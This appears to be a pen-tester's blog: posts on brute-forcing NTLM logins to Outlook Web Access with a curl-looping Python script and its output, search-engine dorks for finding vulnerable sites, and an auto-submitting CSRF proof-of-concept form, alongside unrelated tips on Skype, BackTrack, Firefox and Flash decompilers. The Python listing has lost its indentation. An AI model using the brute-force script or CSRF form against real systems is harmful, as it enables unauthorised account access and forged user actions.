NTLM HTTP Authentication bruteforcing

NTLM Authentication is related by name only to the Microsoft NTLM hashes.
Try to think of NTLM HTTP Authentication as the Integrated Windows Authentication security feature

Tools used to brute-force hashes, may not be applicable to the NTLM HTTP Authentication.

Burp for example cannot brute force NTLM authentication.

Two of the tools which can be used to brute forcing of NTLM Authentication are

– curl
– wget

Curl

Curl can do NTLM Authentication. In addition, a neat feature of curl is that you can specify a list of characters to want iterated over and replaced. For example:

curl -o test_#1_#2 “http: //www.superconfigure.com/{admin,upload,images}[0-2]”

will retrieve all nine paths:

http ://www.superconfigure.com/admin/0

http ://www.superconfigure.com/upload/0

http ://www.superconfigure.com/images/0

and so on, and save a local file with the HTML as test_admin_0, test_admin_1, etc..for each of the nine results.

To specify NTLM authentication, specify –ntlm and specify the user with -u user:password

curl --html -u superconfigure.com\mario:passphrase  https://admin.superconfigure.com

Unfortunately, you can’t use the same syntax for the -u parameter as you can with the URL, so brute-forcing in the following way is not possible.

curl -o test_#1 --ntlm -u superconfigure.com\mario:passw[0-3]rd https ://www.superconfigure.com/emails

internal error: invalid pattern type (0)
Warning: bad output glob!

One way for us to leverage the curl NTLM Authentication capability and brute-force passwords as well is to script it using Python. You obviously want to do this when you KNOW the username and perhaps part of password as well since this is not fast since Python loads curl.

Python script

import os

pwdprefix="mario"

pwdsmiddle=['a','s','d', 'A','S','D']

pwdsuffix=['1','!','#']

cmdprefix="curl -k --ntlm -u \"\SUPERCONFIGURE.COM\mario:"

cmdsuffix="\" https: //email.superconfigure.com/owa/"

for s in pwdsuffix:

for m1 in pwdsmiddle:

pwdattempt=pwdprefix+m1+s

print cmdprefix+pwdattempt+cmdsuffix+" -o "+pwdattempt+".html"

os.system(cmdprefix+pwdattempt+cmdsuffix+" -o "+pwdattempt+".html")

This will save each attempted password as a HTML file, a successful login wil result in a larger file size.

C:\temp\ml>\Python25\python.exe mc.py
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:marioa1" https ://email.superconfigure.com/owa/ -o marioa1.html
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:marios1" https ://email.superconfigure.com/owa/ -o marios1.html
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:mariod1" https ://email.superconfigure.com/owa/ -o mariod1.html
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:marioA1" https ://email.superconfigure.com/owa/ -o marioA1.html

Tweets by 0utlaw

Google hacking with SearchDiggity

A long time ago in a galaxy far away, Google hacking was easy enough. Google hacking queries such as the following :

GET /ajax/services/search/web?v=1.0&rsz=large&start=0&q=site%3aWWW.SUPERCONFIGURE.COM+%22powered+by+my+little+forum%22 HTTP/1.1
Referer: superconfigure.com
Host: ajax.googleapis.com
Proxy-Connection: Keep-Alive

would produce a usable json response:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Fri, 11 Jan 2013 14:41:45 GMT
Content-Type: text/javascript; charset=utf-8
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 325

{"responseData": {"results":[],"cursor":{"moreResultsUrl":"http://www.google.com/search?oe\u003dutf8\u0026ie\u003dutf8\u0026source\u003duds\u0026start\u003d0\u0026hl\u003den\u0026q\u003dsite:SOME.SITE.COM+%22powered+by+my+little+forum%22","searchResultTime":"0.24"}}, "responseDetails": null, "responseStatus": 200}

Unfortunately, Google restricts this such that doing so will block your IP after several requests are performed, in my case this took all of a few seconds and one ~hundred’ish queries, now Google responds with the following:


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Fri, 11 Jan 2013 14:46:26 GMT
Content-Type: text/javascript; charset=utf-8
X-Embedded-Status: 403
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 133

{"responseData": null, "responseDetails": "Quota Exceeded. Please see http://code.google.com/apis/websearch", "responseStatus": 403}

Using tools such as FoundStone’s SiteDigger (An old tool [http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx], company was bought by McAfee and many of their tools although still online, are outdated) fall under these limitations, use it for more than a few queries, and you’ll simply block your IP…

Enter SearchDiggity. http://www.stachliu.com/resources/tools/google-hacking-diggity-project/

Not only will this work for Google Hacking without blocking you, but it supports a number of additional search engines, including the great Shodan. In short,

“With the retirement of Google’s AJAX Search API on November 1, 2010, most of the security utilities available for Google Hacking cease to function properly, leaving the security industry with a need for new and innovative tools. GoogleDiggity is a new utility designed to help fill that need, now leveraging the Google JSON/ATOM Custom Search API, so it will not get you blocked by Google bot detection while scanning.”

The list of Google queries can be seen here: http://www.stachliu.com/dictionaries/Google%20Queries.txt
The list of Bing queries can be seen here: http://www.stachliu.com/dictionaries/Bing%20Queries.txt

Here’s what its query now looks like:


GET /search?q=%22powered+by+php+photo+album%22+%7c+instreamset%3aurl%3a%22main.php%3fcmd%3dalbum%22+-demo2+-pitanje+site%3asuperconfigure.com&first=151 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko Firefox/11.0
Referer: http://www.bing.com/search?q="powered+by+php+photo+album"+|+instreamset:url:"main.php?cmd=album"+-demo2+-pitanje+site:superconfigure.com&first=101
Host: www.bing.com
Cookie: SRCHHPGUSR=NEWWND=0&NRSLT=50&SRCHLANG=&AS=1; MUIDB=0DC3B069C2FB66870E23B43BC3EA6659; SRCHUID=V=2&GUID=42ED8475E3CB4C4AA841641C311C698B; _FS=NU=1; _SS=SID=14A24A7BD3D4449FA207C9F11B1C7D8C; MUID=0DC3B069C2FB66870E23B43BC3EA6659; OrigMUID=0DC3B069C2FB66870E23B43BC3EA6659%2c0666d89df2244490bbbf8d4c3d2b0958; SRCHD=MS=2646195&D=2646192&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20130111; _FS=NU=1; _SS=SID=14A24A7BD3D4449FA207C9F11B1C7D8C; MUID=0DC3B069C2FB66870E23B43BC3EA6659; OrigMUID=0DC3B069C2FB66870E23B43BC3EA6659%2c0666d89df2244490bbbf8d4c3d2b0958; SRCHD=MS=2646195&D=2646192&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20130111


Tweets by 0utlaw

CSRF with BURP

When doing penetration testing on Web applications, I regularly come across vulnerable CSRF sites. Typically I will then manually create the HTML required to reproduce a query in order to perform a sensitive operation unbeknownst to the user.

Sometimes though a POST contains dozens of hidden fields, this makes it tedious and time consuming when editing HTML. Enter Burp.

Burp has a built-in CSRF proof of concept feature which will take the query and generate the HTML for you.

Simply right click the query and under “Engagement tools” you will find the “Generate CSRF PoC” option;

Presto, it will pop up a display containing the HTML which you can use. If you wish to have the web automatically post the data when the file is opened, add the appropriate javascript as follows:

<script type=’text/javascript’>function submitForm(){ document.myForm.submit();}</script>

Here’s an example of what Burp generated for the above request:

<html>
<!– CSRF PoC – generated by Burp Suite Professional –>
<body>
<form action=”http://your.target.com/cgi-bin/ownage/vuln.pl?parms&#8221; method=”POST”>
<input type=”hidden” name=”Name” value=”mario@superconfigure.com” />
<input type=”hidden” name=”Password” value=”youwish” />
<input type=”hidden” name=”s1″ value=”secret” />
<input type=”submit” value=”Submit form” />
</form>
</body>
</html>

Tweets by 0utlaw

 

How to replace your cell provider with Skype for all cell communications in Canada

I dropped my conventional cell carrier entirely in favour of an entirely IP based telephony solution, Skype. My Skype run in my Samsung Galaxy Tab 10.5, nothing rooted, or jail broken.

The biggest hurdle is enabling incoming calls from non-Skype users. Skype does not provide a call-in number for Canada, so you have to pay 10$ a month for a service to do this for you.

10$ a month is pretty inexpensive for a cell phone, including voice-mail with a web interface!

Once you have Skype enabled and you can use it for outgoing calls, head over to http://onekingtelecom.com/ and sign up. Tell them what number you would prefer (if any) and that’s it!

If Skype does ever provide such a service, then you can cancel that and save an additional 10$ monthly.

The only downside is that you will lose your existing number, if any.

Tweets by 0utlaw

Tweaking Back Track with latest tools

I have integrated a couple of tools into my Back Track. For the tools I use most often during pen tests, I tend to create a short cut button in the tool bar to get it opened as quickly as possible.

Here is how to do just that for Web Sorrow and Blind Elephant.

Firstly, a quick overview of these little tools.

Web Sorrow (go here and get it: http://code.google.com/p/web-sorrow/) is similar to Nikto. If you use Nikto you may want to give Web Sorrow a try. Basically it will display the typical low-hanging fruits: Banners, robots.txt contents, default folders, etc. There is just no reason not to use it during a pen test.

As for Blind Elephant (go and get it here: http://blindelephant.sourceforge.net/), it is a fingerprinting tool for Web apps; You need to know if a site is using WordPress for example, and what version of WordPress is in use, this tool will quickly get this information to you.

In my case I have downloaded and placed the tools on the desktop, (feel free to use whatever folder you wish); I have them at the following locations:

/root/Desktop/web sorrow

and

/root/Desktop/blindelephant

To create the tool bar short cuts, do the following:

Right click and choose “Add to Panel”:

 

Now select “Custom Application Launcher”:

and hit the Add button. Be sure to specify “Application in Terminal” as the Type. In the “Command” edit box, add the following:

For Web Sorrow

sh -c “cd ~/Desktop/web\ sorrow/ && perl ./Wsorrow.pl;sudo -s”

For Blind Elephant

sh -c “cd ~/Desktop/blindelephant/src/blindelephant/ && ./BlindElephant.py;sudo -s”

Now you can just click the short cut and run them. Here is an example of Web Sorrow on a site:

And here is an example of Blind Elephant on the same site. First we let it guess the application used:

Now we attempt to determine the version of the WordPress used:

Tweets by 0utlaw

Modifying DOM element values returned by Firefox

There’s an easy way to customize values returned by the DOM through JavaScript in Firefox.

Here are some values as returned by my Firefox 10 in my Backtrack.

Platform: ” + navigator.platform ;

User-agent header: ” + navigator.userAgent

This returns the following:

Platform: Linux i686

User-agent header: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2

This can be modified by opening a tab to: “about:config” and adding
“general.platform.override” and “general.useragent.override” (careful those are case sensitive) as new strings, and giving them the values you want.

Firefox DOM

Now when a page contains, “navigator.platform” instead of getting “Linux i686” they will see “Espresso” instead.

igoogle – Not up to snuff

igoogle is a terrific..AOL-like homepage to the Internet. I do not want to enter a dozen different URLs for common items such as the news, gmail, or contacts every time I boot up; This is what igoogle is meant to be.

Unfortunately it lacks in clear support by Google itself, many of the gadgets are 3rd party and simply do not work.

Case in point, google contacts. It used to work, it has not worked for a few months now. I do not want to blame its author, a certain Nicholas Wilde, I am sure Google changed something to break the gadgets at some point.

Why isn’t Google authoring such a plug-in? This is what it looks like for anyone adding the gadgets now (and this is in Chrome):

Google contacts gadget

And here is the Google plus gadget:

Google Plus Gadget

Wow, good job.

The temporary solution is to add a gadget called the “Box Of Links”, And in there add the links for Google contacts (https://www.google.com/contacts/#contacts) and Google plus (https://plus.google.com/).

Just don’t forget to remove the other two gadgets:-)

gmail

Did you know that gmail enables you to receive emails where the account contains a dot (.)  using any iteration of the location of said period within the email name?

For example, my email of outlaw.was.here@gmail.com can be replaced with

outlaw.washere@gmail.com

outlawwashere@gmail.com

outlawwas.here@gmail.com

Flash, group discussions applet

I implemented an applet using Flash’s networking stack in order to deepen my knowledge of its overall networking capabilities.

The way it works is you enter a pre-agreed-upon roomname, where 2 or more people can have their anonymous discussions.

It relies on Adobe’s Rtmfp protocol which has the advantage of running on most Flash enabled devices (but on my Samsung galaxy Tab the virtual keyboard never pops-up).

Adding video and audio should be quick as the Flash Builder framework makes adding this easy.

https://sec-com.appspot.com/

Give it a spin with “test” as a room.

Which is the “best” Free Flash decompiler for pen testers?

This article compares three popular Flash decompilers. The application used is a real world Flash Application for which I have the original code.
Although SuperGroove is in its alpha stage of development, now is as good a time as any to use these tools in order to determine:

1- Which of them works best for pen testers.
2- And the tools may provide some insight as to possible issues in my Flash code, which I should fix.

The alpha Application is here: https://superconfigure-supergroove.appspot.com/

I downloaded the SWF and ran each of the tools on it.

Note, my SuperGroove Flash application was built with the latest Adobe Flash Builder 4 compiler, (Flex 4.1 SDK), and requires Flash 10.1 at a minimum in the client’s browser.

My .mxml code file is 670 lines.
All tests were run on a x64 Vista PC.

1.  Flare 0.6 (http://www.nowrap.de/flare.html) Free

Installation was simple (100K EXE), then it is just a matter of right clicking the SWF file and selecting “Decompile”.
This generates a .FLR file.

The site states:
– No images, sounds or text are extracted — ActionScript only.
– ActionScript III (Flash 9) isn’t supported. The format is entirely different.

which did not bode well for this test!
Results: Epic Fail. The .FLR file produced by Flare was some 31 lines of nothing.

This was no surprise given the recent version of the Supergroove application, and the dated Flare tool version.

                    
2. HP’s SWFScan 1.0 (https://h30406.www3.hp.com/campaigns/2009/wwcampaign/1-5TUVE/images/SwfScan.msi) Free

Installation was simple (6MB MSI), then you simply add the path to the SWF in the GUI and hit the “Get” button.

The look and very is very similar to Microsoft’s Application Verifier tool, a tool used to verify SDL compliance in unmanaged applications.

Results are very impressive.

First thing I noticed, I had unused strings, which the compiler stripped out of the final app.
So although they appear in the .mxml source code, these are missing from the SWFScan source.

1st thing to do, removed unused variables from my code!

Now for functions.

The results were quite impressive.

Here is my original code:

// Display read-only status information
   private function onNetStatus(event:NetStatusEvent):void {
    
    const _msg:String = "Code:" + event.info.code.toString() + "\nLevel: " + event.info.level + "\nMeaning :" + event.info.meaning;
    // TODO change '+=' back to just '='
    status_text_network_id.text += _msg;
    
    // When UDP is blocked, clicking a room can take some time before an error is shown.
    // This puts back the default cursor since we disable clicking during that waiting period.
    CursorManager.removeBusyCursor();
    FlexGlobals.topLevelApplication.enabled = true;
    
    switch(event.info.code)
    {    
     /*
     The P2P connection attempt succeeded. 
     The info.stream property indicates which stream has succeeded.
     */
     case "NetStream.Connect.Success":
      OnNetStreamConnect();
      break;
     
     /*
     Sent when a new Group Posting is received. 
     The info.message:Object property is the message. 
     The info.messageID:String property is this message's messageID.
     */
     case "NetGroup.Posting.Notify": // somebody posted something!
      receiveMessage(event.info.message);
      break;

Here is the SWFScan produced source code:

 

        private function onNetStatus(arg0:flash.events::NetStatusEvent)
        {
            var loc0:* = "Code:" + toString() + "
            Level: " + arg0.info.level + "
            Meaning :" + arg0.info.meaning;
            this.status_text_network_id.text = 0;
            CursorManager.removeBusyCursor();
            FlexGlobals.topLevelApplication.enabled = true;
            var loc1:* = arg0.info.code;
            switch(loc1)
            {
                case "NetStream.Connect.Success":
                    this.OnNetStreamConnect();
                    break;
                case "NetGroup.Posting.Notify":
                    this.receiveMessage(arg0.info.message);
                    break;

The results speak for themselves. Here is another excerpt,

My original code:

                        private function hithere(info:Object):void
   {
    var sort:Sort = new Sort();
    sort.fields = [new SortField("label", true)]; 
    listData.sort = sort;    
    var o:Object = new Object();    
    o.label = info.user;    
    o.peer  = info.sender;
    // info.text isn't here of course, we hard-coded it
    listData.addItem(o);
    listData.refresh();  // this does the actual sort
   }

 
Here is the SWFScan produced source code:

        private function hithere(arg0:Object)
        {
            var loc2:* = null;
            var loc0:* = new Object();
            loc0.label = arg0.user;
            loc0.peer = arg0.sender;
            var loc1:* = 0;
            while(loc1 < this.listData.length)
            {
                loc2 = getItemAt(loc1);
                if(getItemAt(loc1).label == loc0.label)
                {
                    return;
                }
                loc1 = loc1 + 1;
            }
            addItem(loc0);
            refresh();
            return;
            
        }

In addition its UI is very intuitive, there’s even a tab to display the discovered URLS.

There’s even an Analyze feature used to obtain a report of vulnerabilities in the application.
I don’t know if it’s because there was no vulnerabilities found or if the feature failed, but I obtained no results from the Analyze feature.

3.  SwfIntruder 0.9.1 (http://code.google.com/p/swfintruder/downloads/detail?name=swfintruder-0.9.1.tgz&can=2&q=) Free

Installation was simple (100KB TGZ), which you extract, then simply point your browser (site states it requires Firefox 2.x) to the 127.0.0.1/…/index.html file.

It is a OWASP tool, and the site (https://www.owasp.org/index.php/Category:SWFIntruder) states:

“SWFIntruder purpose is to analyze a Flash application for version =< 8”

So the test is a fail due to Flash 10 being used in my application.

Summary

HP’s product was the clear winner, providing both the most complete functionality and features, ease of use, and detailed reports.